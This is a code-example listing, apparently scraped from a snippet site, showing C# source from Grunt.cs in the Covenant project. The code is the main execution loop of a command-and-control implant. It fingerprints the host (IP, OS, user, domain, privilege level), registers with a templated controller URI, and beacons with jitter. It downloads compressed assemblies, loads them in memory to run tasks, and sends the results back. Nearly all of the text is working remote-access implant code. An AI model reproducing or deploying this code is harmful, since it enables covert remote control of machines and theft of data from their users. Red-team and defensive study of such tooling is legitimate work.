コード例 #1
0
ファイル: Grunt.cs プロジェクト: zshell/Covenant
 public TaskCompletedArgs(GruntTaskingMessage message, String output)
 {
     this.message = message;
     this.output  = output;
 }
コード例 #2
0
ファイル: Grunt.cs プロジェクト: zshell/Covenant
        public static void Execute(Aes SessionKey)
        {
            try
            {
                string        CovenantURI      = @"{{REPLACE_COVENANT_URI}}";
                string        CovenantCertHash = @"{{REPLACE_COVENANT_CERT_HASH}}";
                int           Id                      = Convert.ToInt32(@"{{REPLACE_GRUNT_ID}}");
                string        Name                    = @"{{REPLACE_GRUNT_NAME}}";
                int           Delay                   = Convert.ToInt32(@"{{REPLACE_DELAY}}");
                int           Jitter                  = Convert.ToInt32(@"{{REPLACE_JITTER}}");
                int           ConnectAttempts         = Convert.ToInt32(@"{{REPLACE_CONNECT_ATTEMPTS}}");
                List <string> ProfileHttpHeaderNames  = new List <string>();
                List <string> ProfileHttpHeaderValues = new List <string>();
                // {{REPLACE_PROFILE_HTTP_HEADERS}}
                List <string> ProfileHttpUrls = new List <string>();
                // {{REPLACE_PROFILE_HTTP_URLS}}
                List <string> ProfileHttpCookies = new List <string>();
                // {{REPLACE_PROFILE_HTTP_COOKIES}}
                string ProfileHttpGetResponse  = @"{{REPLACE_PROFILE_HTTP_GET_RESPONSE}}";
                string ProfileHttpPostRequest  = @"{{REPLACE_PROFILE_HTTP_POST_REQUEST}}";
                string ProfileHttpPostResponse = @"{{REPLACE_PROFILE_HTTP_POST_RESPONSE}}";

                string IPAddress = Dns.GetHostAddresses(Dns.GetHostName())[0].ToString();
                foreach (IPAddress a in Dns.GetHostAddresses(Dns.GetHostName()))
                {
                    if (a.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
                    {
                        IPAddress = a.ToString();
                        break;
                    }
                }
                string OperatingSystem = Environment.OSVersion.ToString();
                string Process         = System.Diagnostics.Process.GetCurrentProcess().ProcessName;
                int    Integrity       = 2;
                if (Environment.UserName.ToLower() == "system")
                {
                    Integrity = 4;
                }
                else
                {
                    var identity = WindowsIdentity.GetCurrent();
                    if (identity.Owner != identity.User)
                    {
                        Integrity = 3;
                    }
                }
                string UserDomainName = Environment.UserDomainName;
                string UserName       = Environment.UserName;

                string         RegisterBody = @"{ ""id"": " + Convert.ToString(Id) + @", ""name"": """ + Name + @""", ""integrity"": " + Integrity + @", ""process"": """ + Process + @""", ""userDomainName"": """ + UserDomainName + @""", ""userName"": """ + UserName + @""", ""delay"": " + Convert.ToString(Delay) + @", ""jitter"": " + Convert.ToString(Jitter) + @", ""connectAttempts"": " + Convert.ToString(ConnectAttempts) + @", ""status"": 0, ""ipAddress"": """ + IPAddress + @""", ""operatingSystem"": """ + OperatingSystem + @""" }";
                GruntMessenger messenger    = new GruntMessenger
                                              (
                    Id, Name, CovenantURI,
                    CovenantCertHash, SessionKey,
                    RegisterBody,
                    ProfileHttpHeaderNames, ProfileHttpHeaderValues,
                    ProfileHttpUrls, ProfileHttpCookies,
                    ProfileHttpGetResponse, ProfileHttpPostRequest, ProfileHttpPostResponse
                                              );
                TaskHandler taskSender = new TaskHandler();
                EventHandler <TaskCompletedArgs> taskHandler = (sender, eventArgs) =>
                {
                    messenger.PostMessage(eventArgs.output, eventArgs.message.name);
                };
                taskSender.TaskCompleted += taskHandler;
                Random rnd = new Random();
                int    ConnectAttemptCount = 0;
                bool   alive = true;
                while (alive)
                {
                    Thread.Sleep((Delay + rnd.Next(Jitter)) * 1000);
                    try
                    {
                        GruntTaskingMessage message = messenger.GetMessage("");
                        if (message != null)
                        {
                            ConnectAttemptCount = 0;
                            if (message.type == GruntTaskingType.Assembly)
                            {
                                string[] pieces = message.message.Split(',');
                                if (pieces.Length > 0)
                                {
                                    object[] parameters = null;
                                    if (pieces.Length > 1)
                                    {
                                        parameters = new object[pieces.Length - 1];
                                    }
                                    for (int i = 1; i < pieces.Length; i++)
                                    {
                                        parameters [i - 1] = Encoding.UTF8.GetString(Convert.FromBase64String(pieces[i]));
                                    }
                                    byte[]   compressedBytes   = Convert.FromBase64String(pieces[0]);
                                    byte[]   decompressedBytes = Utilities.Decompress(compressedBytes);
                                    Assembly gruntTask         = Assembly.Load(decompressedBytes);
                                    new Thread(() => taskSender.ExecuteTask(gruntTask, parameters, message)).Start();
                                }
                            }
                            else if (message.type == GruntTaskingType.Set)
                            {
                                GruntSetTaskingType type = (GruntSetTaskingType)Enum.Parse(typeof(GruntSetTaskingType), message.message.Substring(0, message.message.IndexOf(',')));
                                String val = message.message.Substring(message.message.IndexOf(',') + 1);
                                if (type == GruntSetTaskingType.Delay)
                                {
                                    Delay = int.Parse(val);
                                }
                                else if (type == GruntSetTaskingType.Jitter)
                                {
                                    Jitter = int.Parse(val);
                                }
                                else if (type == GruntSetTaskingType.ConnectAttempts)
                                {
                                    ConnectAttempts = int.Parse(val);
                                }
                            }
                            else if (message.type == GruntTaskingType.Kill)
                            {
                                messenger.PostMessage("Killed", message.name);
                                return;
                            }
                        }
                    }
                    catch (Exception)
                    {
                        ConnectAttemptCount++;
                        if (ConnectAttemptCount >= ConnectAttempts)
                        {
                            return;
                        }
                    }
                }
            }
            catch (Exception e) { Console.Error.WriteLine(e.Message); Console.Error.WriteLine(e.StackTrace); }
        }